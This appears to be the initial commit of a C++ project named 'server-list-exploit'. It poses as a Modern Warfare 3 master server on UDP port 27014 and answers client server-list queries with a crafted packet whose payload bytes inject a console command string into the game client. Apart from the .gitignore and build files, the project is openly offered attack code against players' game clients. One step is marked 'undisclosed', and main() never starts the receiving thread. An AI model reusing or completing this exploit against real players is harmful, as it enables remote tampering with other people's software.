Init

.gitignore

@@ -0,0 +1,153 @@
+### Windows
+
+# Windows image file caches
+Thumbs.db
+ehthumbs.db
+
+# Folder config file
+Desktop.ini
+
+# Recycle Bin used on file shares
+$RECYCLE.BIN/
+
+# Windows Installer files
+*.cab
+*.msi
+*.msm
+*.msp
+
+# Shortcuts
+*.lnk
+
+### OSX
+
+.DS_Store
+.AppleDouble
+.LSOverride
+
+# Icon must end with two \r
+Icon
+
+# Thumbnails
+._*
+
+# Files that might appear on external disk
+.Spotlight-V100
+.Trashes
+
+# Directories potentially created on remote AFP share
+.AppleDB
+.AppleDesktop
+Network Trash Folder
+Temporary Items
+.apdisk
+
+### Visual Studio
+
+# User-specific files
+*.suo
+*.user
+*.userosscache
+*.sln.docstates
+
+# User-specific files (MonoDevelop/Xamarin Studio)
+*.userprefs
+
+# Build results
+build
+
+# Visual Studio 2015 cache/options directory
+.vs/
+
+#Visual Studio Code
+.vscode/
+
+# MSTest test Results
+[Tt]est[Rr]esult*/
+[Bb]uild[Ll]og.*
+ 
+*_i.c
+*_p.c
+*_i.h
+*.ilk
+*.meta
+*.obj
+*.pch
+*.pdb
+*.pgc
+*.pgd
+*.rsp
+*.sbr
+*.tlb
+*.tli
+*.tlh
+*.tmp
+*.tmp_proj
+*.log
+*.vspscc
+*.vssscc
+.builds
+*.pidb
+*.svclog
+*.scc
+
+# Visual C++ cache files
+ipch/
+*.aps
+*.ncb
+*.opendb
+*.opensdf
+*.sdf
+*.cachefile
+
+# Visual Studio profiler
+*.psess
+*.vsp
+*.vspx
+*.sap
+
+# TFS 2012 Local Workspace
+$tf/
+
+# Guidance Automation Toolkit
+*.gpState
+
+# Visual Studio cache files
+# files ending in .cache can be ignored
+*.[Cc]ache
+# but keep track of directories ending in .cache
+!*.[Cc]ache/
+
+# Others
+~$*
+*~
+*.dbmdl
+*.dbproj.schemaview
+*.pfx
+*.publishsettings
+
+# Backup & report files from converting an old project file
+# to a newer Visual Studio version. Backup files are not needed,
+# because we have git ;-)
+_UpgradeReport_Files/
+Backup*/
+UpgradeLog*.XML
+UpgradeLog*.htm
+
+# SQL Server files
+*.mdf
+*.ldf
+
+### IDA
+*.id0
+*.id1
+*.id2
+*.nam
+*.til
+
+### Custom user files
+# User scripts
+user*.bat
+
+# Premake binary
+#premake5.exe

generate.bat

@@ -0,0 +1,3 @@
+@echo off
+git submodule update --init --recursive
+tools\premake5 %* vs2019

premake5.lua

@@ -0,0 +1,108 @@
+dependencies = {
+	basePath = "./deps"
+}
+
+function dependencies.load()
+	dir = path.join(dependencies.basePath, "premake/*.lua")
+	deps = os.matchfiles(dir)
+
+	for i, dep in pairs(deps) do
+		dep = dep:gsub(".lua", "")
+		require(dep)
+	end
+end
+
+function dependencies.imports()
+	for i, proj in pairs(dependencies) do
+		if type(i) == 'number' then
+			proj.import()
+		end
+	end
+end
+
+function dependencies.projects()
+	for i, proj in pairs(dependencies) do
+		if type(i) == 'number' then
+			proj.project()
+		end
+	end
+end
+
+newoption {
+	trigger = "copy-to",
+	description = "Optional, copy the EXE to a custom folder after build, define the path here if wanted.",
+	value = "PATH"
+}
+
+newoption {
+	trigger = "dev-build",
+	description = "Enable development builds of the client."
+}
+
+dependencies.load()
+
+workspace "server-list-exploit"
+location "./build"
+objdir "%{wks.location}/obj"
+targetdir "%{wks.location}/bin/%{cfg.platform}/%{cfg.buildcfg}"
+
+configurations {"Debug", "Release"}
+
+architecture "x86"
+platforms "x86"
+
+systemversion "latest"
+symbols "On"
+staticruntime "On"
+editandcontinue "Off"
+warnings "Extra"
+characterset "ASCII"
+
+if _OPTIONS["dev-build"] then
+	defines {"DEV_BUILD"}
+end
+
+flags {"NoIncrementalLink", "NoMinimalRebuild", "MultiProcessorCompile", "No64BitChecks" }
+
+filter "action:vs*"
+buildoptions "/std:c++17"
+defines { "_WINDOWS", "WIN32" }
+
+filter "action:gmake*"
+cppdialect "C++17"
+buildoptions "-std=c++17"
+defines { "_LINUX"	}
+
+configuration "Release"
+optimize "Size"
+-- buildoptions {"/GL"}
+-- linkoptions { "/IGNORE:4702", "/LTCG" }
+
+defines {"NDEBUG"}
+
+flags {"FatalCompileWarnings"}
+
+configuration "Debug"
+optimize "Debug"
+
+defines {"DEBUG", "_DEBUG"}
+
+configuration {}
+
+project "server-list-exploit"
+kind "ConsoleApp"
+language "C++"
+
+pchheader "stdinc.hpp"
+pchsource "src/stdinc.cpp"
+
+files {"./src/**.hpp", "./src/**.cpp"}
+
+includedirs {"./src", "%{prj.location}/src"}
+
+-- links {"kernel32", "user32", "Ws2_32"}
+
+dependencies.imports()
+
+group "Dependencies"
+dependencies.projects()

src/main.cpp

@@ -0,0 +1,94 @@
+#include "stdinc.hpp"
+#include "main.hpp"
+
+#define MW3_SERVER_4CC 0x504F4F4C
+#define BUF_SIZE 1024
+
+SOCKET sock;
+
+bool startUp()
+{
+    WSADATA wsa_data;
+	WSAStartup(MAKEWORD(2, 2), &wsa_data);
+
+    sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
+    if (INVALID_SOCKET == sock)
+	{
+		printf("Can't initialize socket\n");
+		return false;
+	}
+
+    sockaddr_in service;
+	service.sin_family = AF_INET;
+	service.sin_addr.s_addr = htonl(INADDR_ANY);
+
+//  net_masterServerPort
+    service.sin_port = htons(27014);
+    int result = bind(sock, (SOCKADDR*)&service, sizeof(service));
+    if (SOCKET_ERROR == result)
+    {
+        printf("Can't bind socket\n");
+        closesocket(sock);
+        return false;
+    }
+
+
+    return true;
+}
+
+DWORD WINAPI recvTh(LPVOID)
+{
+    auto buf = std::make_unique<char[]>(BUF_SIZE);
+
+    u_long iMode = 1;
+    ioctlsocket(sock, FIONBIO, &iMode);
+
+    sockaddr_in sender{};
+	int senderSize = sizeof(sender);
+    serverInfo_t info{};
+
+//  undisclosed step
+    info.serverName_ptr = 0;
+    info.rawDataSize = INFO_MAX_DATA;
+    SecureZeroMemory(&info.rawData, info.rawDataSize);
+
+    while (1)
+    {
+        SecureZeroMemory(buf.get(), BUF_SIZE);
+        auto len = recvfrom(sock, buf.get(), BUF_SIZE, 0, (SOCKADDR*)&sender, &senderSize);
+
+        if (len == SOCKET_ERROR)
+		{
+			return -1;
+		}
+
+        if (len == sizeof(serverQuery_t))
+        {
+            auto* packet = (serverQuery_t*)buf.get();
+
+            if (packet->magic4CC == MW3_SERVER_4CC)
+            {
+                printf("Server is sending info to a client\n");
+                auto bad_string = "\x5e\x01\xCC\xCC\x0C" "depthprepass"s;
+//              auto bad_string = "\x5e\x01\xCC\xCC\x0A" "shellshock"s;
+                std::memcpy(&info.rawData[info.serverName_ptr], bad_string.data(), bad_string.length() + 1);
+                sendto(sock, (char*)&info, sizeof(serverInfo_t), 0, (SOCKADDR*)&sender, senderSize);
+            }
+        }
+#ifdef _LINUX
+        sleep(1000);
+#else
+        Sleep(1);
+#endif
+    }
+}
+
+int main(int, char**)
+{
+    if (!startUp())
+	{
+		return 1;
+	}
+
+    WSACleanup();
+}

src/main.hpp

@@ -0,0 +1,39 @@
+#pragma once
+
+#define INFO_MAX_DATA 2048
+
+#pragma pack(1)
+
+typedef struct
+{
+	uint32_t magic4CC;
+	uint32_t timeStamp;
+} serverQuery_t;
+
+typedef struct
+{
+	uint32_t magic4CC;
+	uint32_t timeStamp;
+	int32_t players;
+	int32_t maxPlayers;
+	bool bPasswordProtected;
+	uint32_t bDedicated;
+	int32_t serverVersion;
+	uint64_t SteamId;
+	uint32_t gameIP_int;
+	uint32_t gameIP_ext;
+	uint16_t gamePort;
+	uint16_t queryPort;
+	uint16_t netPort;
+	char secID[8];
+	char secKey[16];
+	uint16_t mapName_ptr;
+	uint16_t serverName_ptr;
+	uint16_t serverTags_ptr;
+	uint16_t serverInfos_ptr;
+	uint16_t rawDataSize;
+	char rawData[INFO_MAX_DATA];
+
+} serverInfo_t;
+
+#pragma pack()

src/stdinc.cpp

@@ -0,0 +1 @@
+#include "stdinc.hpp"

src/stdinc.hpp

@@ -0,0 +1,34 @@
+#ifdef _LINUX
+#pragma clang diagnostic push
+#pragma clang diagnostic ignored "-Wpragma-pack"
+#endif
+
+// defines
+#define WIN32_LEAN_AND_MEAN
+
+// windows headers
+#include <WinSock2.h>
+#include <ws2tcpip.h>
+#include <windows.h>
+#include <string>
+#include <vector>
+#include <iostream>
+#include <memory>
+#pragma comment (lib, "Ws2_32.lib")
+
+// std includes
+#include <string>
+
+#ifdef _LINUX
+#include <unistd.h>
+#endif
+
+using namespace std::literals;
+
+// c types
+
+#include <cstdint>
+
+#ifdef _LINUX
+#pragma clang diagnostic pop
+#endif